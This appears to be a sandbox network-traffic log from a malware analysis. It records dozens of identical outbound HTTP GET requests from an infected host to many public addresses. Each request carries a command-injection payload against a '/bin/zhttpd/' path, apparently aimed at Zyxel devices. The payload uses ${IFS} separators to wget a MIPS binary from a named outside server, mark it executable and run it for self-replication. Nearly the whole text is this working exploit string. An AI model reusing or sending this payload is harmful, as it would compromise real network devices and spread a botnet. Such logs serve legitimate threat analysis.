                                            Feb 2, 2024 06:21:29.986912966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8969192.168.2.1534134119.235.227.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.986949921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8970192.168.2.1538776105.2.192.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987003088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8971192.168.2.1552912172.165.245.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987071991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8972192.168.2.1549870161.95.110.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987124920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8973192.168.2.1549554222.192.16.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987157106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8974192.168.2.1534626107.153.254.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987194061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8975192.168.2.1556562120.14.146.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987235069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8976192.168.2.1544064200.150.30.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987277985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8977192.168.2.1548656111.24.67.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987346888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8978192.168.2.1548830223.120.61.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987384081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8979192.168.2.1534796128.199.43.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987427950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8980192.168.2.1541700160.105.158.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987447023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8981192.168.2.153618246.123.131.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987483025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8982192.168.2.1560878126.87.130.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987535954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8983192.168.2.154952818.170.108.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987596035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8984192.168.2.1553670176.215.157.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987610102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8985192.168.2.1547776157.29.255.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987653971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8986192.168.2.1553034133.117.44.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987700939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8987192.168.2.155114024.15.110.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987742901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8988192.168.2.154987461.105.120.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987785101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8989192.168.2.155075019.83.155.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987833023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8990192.168.2.153872068.178.89.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987842083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8991192.168.2.1554730162.5.99.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987869024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8992192.168.2.153798485.108.95.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987934113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8993192.168.2.1538610123.23.37.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.987962008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8994192.168.2.1553814112.17.110.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988013983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8995192.168.2.155956067.222.28.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988039017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8996192.168.2.15413405.195.155.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988081932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8997192.168.2.1547398142.252.251.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988117933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8998192.168.2.1560962176.206.218.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988177061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8999192.168.2.155969843.106.231.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988188982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9000192.168.2.154838474.190.16.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988224030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9001192.168.2.1558798175.53.117.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988277912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9002192.168.2.1547674206.129.24.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988327026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9003192.168.2.1554554111.255.83.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988358974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9004192.168.2.1542828138.30.166.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988395929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9005192.168.2.1556332129.137.172.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988446951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9006192.168.2.1544978196.78.205.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988512993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9007192.168.2.155113279.237.30.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988535881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9008192.168.2.1534346187.98.3.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.988564968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9009192.168.2.1542740138.4.240.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992290974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9010192.168.2.156003875.242.42.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992321968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9011192.168.2.1534010120.168.170.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992357016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9012192.168.2.154797275.58.222.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992429018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9013192.168.2.155594058.23.155.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992451906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9014192.168.2.1557182203.81.90.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992487907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9015192.168.2.155399095.69.129.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992538929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9016192.168.2.154456831.10.20.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992563009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9017192.168.2.1545980119.81.74.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992584944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9018192.168.2.1551452143.142.82.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992635012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9019192.168.2.1535476154.160.47.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992702007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9020192.168.2.1546942134.118.210.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.992731094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9021192.168.2.1556970100.134.25.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001617908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9022192.168.2.15395744.184.246.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001663923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9023192.168.2.1553904183.16.91.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001705885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9024192.168.2.154912238.136.79.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001717091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9025192.168.2.1549726220.11.95.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001760960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9026192.168.2.1536222167.247.230.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001791954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9027192.168.2.155751454.131.205.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001863003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9028192.168.2.1537906190.35.252.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001909018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9029192.168.2.1535402164.176.4.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001918077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9030192.168.2.1551058132.236.10.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.001971006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9031192.168.2.155318674.127.163.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.002041101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9032192.168.2.153690017.92.161.151443
                                            TimestampBytes transferredDirectionData
